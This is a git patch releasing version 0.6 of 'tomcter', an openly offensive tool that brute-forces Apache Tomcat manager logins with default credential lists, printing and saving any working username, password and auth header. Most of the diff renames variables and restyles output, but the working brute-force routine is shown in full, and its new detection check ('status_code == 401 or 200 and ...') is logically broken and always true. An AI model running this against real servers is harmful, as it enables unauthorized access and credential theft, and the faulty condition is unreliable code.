From 3a3bada4372e7d16e55324489f9db9530f675fde Mon Sep 17 00:00:00 2001 From: oppsec Date: Sun, 31 Jul 2022 20:12:06 -0300 Subject: [PATCH] release: tomcter 0.6 --- CHANGELOG.md | 6 ++++++ README.md | 2 +- src/core/multiple.py | 25 ++++++++++++++----------- src/core/single.py | 23 +++++++++++++---------- src/interface/banner.txt | 13 ++++--------- 5 files changed, 38 insertions(+), 31 deletions(-) create mode 100644 CHANGELOG.md diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100644 index 0000000..d6b00d9 --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,6 @@ +# 🎉 0.6 - 31/07/2022 +- Created CHANGELOG.md file +- Updated ascii art +- New banner image +- New color scheme +- Fixed multiple website file blank url scanning \ No newline at end of file diff --git a/README.md b/README.md index 1b25a7c..e73603f 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ > Stealing credentials from a yellow cat
- +

diff --git a/src/core/multiple.py b/src/core/multiple.py index b2fa029..6c901b4 100644 --- a/src/core/multiple.py +++ b/src/core/multiple.py @@ -20,18 +20,20 @@ def connect(args) -> str: for target in content: if target == None: - pass + return target = target.rstrip() - path: str = f"{target}/manager/html" + url: str = f"{target}/manager/html" try: - response = get(path, **props) + response = get(url, **props) body: str = response.text status_code: str = response.status_code - detect = lambda success = 401 or 200: status_code == success and 'Tomcat' or 'tomcat' in body - (bruteforce(path)) if detect() else print(f"[red][*] Connection problems with {target} | {status_code} [/]") + if status_code == 401 or 200 and 'Tomcat' or 'tomcat' in body: + bruteforce(url) + else: + print(f"[red][-] Connection problems with {target} | {status_code} [/]") except Exception as e: return print(f"[red][!] An error happened: {e} [/]") @@ -40,10 +42,11 @@ def connect(args) -> str: pass -def bruteforce(path) -> str: +def bruteforce(url) -> str: """ Bruteforce Apache Tomcat login with default credentials """ - print(f"[yellow][!] Starting bruteforce on {path} [/]") + print(f"[bold yellow][*] Starting bruteforce on [bold white]{url}[/][/]") + print(f"[bold yellow][*] {len(get_usernames())} Usernames loaded. {len(get_passwords())} Passwords loaded.[/]") for u, p in zip(get_usernames(), get_passwords()): @@ -58,13 +61,13 @@ def bruteforce(path) -> str: auth_header: str = { 'Authorization': auth_string, 'User-Agent': user_agent() } - response = get(path, verify=False, headers=auth_header) + response = get(url, verify=False, headers=auth_header) status_code: str = response.status_code if (status_code == 200): - print(f"[green][+] Login: {u+p} | URL: {path} | Cookie: {auth_string}\n [/]") + print(f"[green][+] Credentials ~ {u+p} | Cookie: {auth_string}\n[/]") with open("src/core/result/out.txt", "a+") as file: - file.write(f"{path} | {u+p} | {auth_string}") + file.write(f"{url} | {u+p} | {auth_string}") - print(f"[cyan][*] Bruteforce on {path} is done.\n [/]") \ No newline at end of file + print(f"[bold white][*] Bruteforce in {url} is done.\n[/]") \ No newline at end of file diff --git a/src/core/single.py b/src/core/single.py index 0240f2b..e3f315e 100644 --- a/src/core/single.py +++ b/src/core/single.py @@ -12,15 +12,17 @@ def single_connect(args) -> str: """ Check if target is alive and try to connect with Apache Tomcat login page """ target = args.u - path: str = f"{target}/manager/html" + url: str = f"{target}/manager/html" try: - response = get(path, **props) + response = get(url, **props) body: str = response.text status_code: str = response.status_code - detect = lambda success = 401 or 200: status_code == success and 'Tomcat' or 'tomcat' in body - (bruteforce(path)) if detect() else print(f"[red][-] Connection problems with {target} | {status_code} [/]") + if status_code == 401 or 200 and 'Tomcat' or 'tomcat' in body: + bruteforce(url) + else: + print(f"[red][-] Connection problems with {target} | {status_code} [/]") except Exception as e: return print(f"[red][-] An error happened: {e} [/]") @@ -29,10 +31,11 @@ def single_connect(args) -> str: pass -def bruteforce(path) -> str: +def bruteforce(url) -> str: """ Bruteforce Apache Tomcat login with default credentials """ - print(f"[yellow][!] Starting bruteforce on {path} [/]") + print(f"[bold yellow][*] Starting bruteforce on [bold white]{url}[/][/]") + print(f"[bold yellow][*] {len(get_usernames())} Usernames loaded. {len(get_passwords())} Passwords loaded.[/]") for u, p in zip(get_usernames(), get_passwords()): @@ -47,13 +50,13 @@ def bruteforce(path) -> str: auth_header: str = { 'Authorization': auth_string, 'User-Agent': user_agent() } - response = get(path, verify=False, headers=auth_header) + response = get(url, verify=False, headers=auth_header) status_code: str = response.status_code if (status_code == 200): - print(f"[green][+] Login: {u+p} | URL: {path} | Cookie: {auth_string}\n [/]") + print(f"[green][+] Credentials ~ {u+p} | Cookie: {auth_string}\n[/]") with open("src/core/result/out.txt", "a+") as file: - file.write(f"{path} | {u+p} | {auth_string}") + file.write(f"{url} | {u+p} | {auth_string}") - print(f"[yellow][!] Bruteforce in {path} is done.\n [/]") \ No newline at end of file + print(f"[bold white][*] Bruteforce in {url} is done.\n[/]") \ No newline at end of file diff --git a/src/interface/banner.txt b/src/interface/banner.txt index 7b5c390..2fca550 100644 --- a/src/interface/banner.txt +++ b/src/interface/banner.txt @@ -1,10 +1,5 @@ - ______ ______ __ __ ______ ______ ______ ______ -/\__ _\ /\ __ \ /\ "-./ \ /\ ___\ /\__ _\ /\ ___\ /\ == \ -\/_/\ \/ \ \ \/\ \ \ \ \-./\ \ \ \ \____ \/_/\ \/ \ \ __\ \ \ __< - \ \_\ \ \_____\ \ \_\ \ \_\ \ \_____\ \ \_\ \ \_____\ \ \_\ \_\ - \/_/ \/_____/ \/_/ \/_/ \/_____/ \/_/ \/_____/ \/_/ /_/ - - -Stealing credentials from a yellow cat ¯\_(ツ)_/¯ -build: 0.5 + _._ _,-'""`-._ +(,-.`._,'( |\`-/| Tomcter 0.6 + `-.-' \ )-`( , o o) Stealing credentials from a yellow cat + `- \`_`"'-